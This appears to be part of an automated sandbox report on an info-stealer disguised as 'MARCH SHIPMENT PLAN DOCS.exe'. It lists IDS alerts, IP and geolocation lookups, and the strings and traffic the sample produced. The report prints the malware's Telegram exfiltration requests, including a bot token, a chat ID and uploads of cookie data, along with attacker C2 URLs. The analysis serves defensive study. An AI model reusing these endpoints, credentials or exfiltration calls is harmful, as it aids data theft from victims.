              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2006/03/2025%20/%2003:53:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744331132&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5c610e80a695Host: api.telegram.orgContent-Length: 1282
              Source: global trafficHTTP traffic detected: POST /bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744331132&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5cd0d6d8d833Host: api.telegram.orgContent-Length: 1282
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
              Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
              Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49768 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49779 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49829 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49825 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49762 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49856 -> 104.21.32.1:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49706 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49747 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2005/03/2025%20/%2016:09:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2006/03/2025%20/%2003:53:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744331132&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5c610e80a695Host: api.telegram.orgContent-Length: 1282
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 05 Mar 2025 07:35:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 05 Mar 2025 07:35:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1321551762.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
              Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E19000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003249000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003244000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003171000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003101000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003101000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003171000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000312B000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
